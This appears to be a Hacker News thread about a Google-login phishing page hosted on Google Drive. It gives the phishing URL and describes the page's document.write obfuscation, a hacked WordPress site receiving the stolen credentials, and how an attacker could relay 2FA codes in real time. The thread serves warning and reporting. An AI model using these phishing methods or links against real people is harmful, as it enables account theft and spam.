

Someone Mailed Me an Amazing Phishing Page of Google Login - h43k3r

https:&#x2F;&#x2F;googledrive.com&#x2F;host&#x2F;0B8XF8k7djaD0b1JtU2lpTzBnWUE&#x2F;<p>DON&#x27;T ENTER YOUR CREDENTIALS ON THE ABOVE PAGE. It is SPAM page which I got from one of my friend.<p>The above link is a great example how even informed people can get into phishing traps. It has HTTPS looks exactly like Google Login.<p>This supports my theory that everyone should enable 2 factor authentication.<p>EDIT - Checkout its source, the whole page is generated using JS ( I am not sure of this claim)<p>EDIT2 - I have reported it to Google as a phishing page. I am adding a screenshot for future if google takes down it somehow. Link - http:&#x2F;&#x2F;imgur.com&#x2F;sTY1uRP<p>EDIT3 - It will send spam to all the emails in your contact book using your gmail id. Tried it with a dummy account.
======
smt88
Unfortunately, some idiotic companies actually do use non-standard domain
names.

For example, my Citi credit card uses "accountonline.com" as the login page.
With things like that, "googledrive.com" seems less suspicious.

So to anyone building for the web: please use a single, canonical domain name!

~~~
0942v8653
[https://googledrive.com](https://googledrive.com) _is_ Google! It's hosted
with Google drive (like dropbox can do). So this is one case where it would
pay not to use the same domain, actually.

Edit: Also important because that way password autofill won't automatically
fill in your details.

~~~
smt88
That's a major security flaw.

On the plus side, looks like your report worked. As of a few minutes after you
posted, the link says it's a phishing scam.

~~~
vxNsr
Actually that's a feature, now anyone can host a simple webpage without any
hassle the fact that this dude figured out a way around it is kinda cool but
I'd rather they not remove this bec of phishing attacks.

On the other hand I can see how THIS specific attack is very dangerous: people
might assume that they need to login to google to see the content hosted by
google....

------
vxNsr
I very nearly entered my creds just by instinct it looks truly legit, just so
you know now chrome stops you from going there (you need to admit to being an
idiot before you can move forward)

------
0942v8653
I tried to submit the form but Safari warned me that it wasn't being submitted
securely. I wonder if they use JS to detect what you're typing in before it's
submitted.

~~~
dbansal
Of course its possible to capture a users screen as soon they visit a page.
Check mouseflow or gamooga secondscreen

------
mod
Re: 2-factor auth:

Couldn't the app try to login, detect the 2-factor, and ask you for that in
the response?

~~~
Someone1234
Yes it could.

However it would only have 60 seconds (30 + 30 sec) to forward that to Google
along with your credentials. It cannot be done via the user's browser due to
forgery protection on Google's end, so a third party piece of software would
have to grab the credentials including 2f code and log in using a "browser"
(e.g. WebKit engine).

One challenging problem is for the site to know if it should prompt you for
the 2f code. It won't know until it tries to login, and it won't be able to
try and login until it forwards your credentials to a third party piece of
software and then gets a reply back. Even assuming this is done very fast, it
could still take a few seconds, in particular if Google starts to throttle
their client's IP.

It would likely be easier just to target low hanging fruit (i.e. non-2F
people) unless this is a targeted attack.

------
harshil93
Holy Shit. It looks damm original

------
n-gauge
the only give away is the ')); characters in the bottom left of the screen

~~~
h43k3r
I totally missed that because of my screen resolution. I need to scroll to see
that.

------
shiftpgdn
Goodness I'd have even gotten busted by that. That's quite clever.

------
h43k3r
I would love to know the technical details behind the creation of this page.

~~~
slipstream-
It's just a webpage hosted on Google Drive:

[https://support.google.com/drive/answer/2881970?hl=en](https://support.google.com/drive/answer/2881970?hl=en)

Regarding the contents of the page itself:

first layer of obfuscation document.write's a script tag to include "aa.js"
which document.write's the main phishing page itself, which sends contents
directly to a hacked WordPress site ( cairngormsagainstpylons dot org ).

Reported via Google Drive abuse as a phishing page.

------
benshyong
wow this is ridiculous

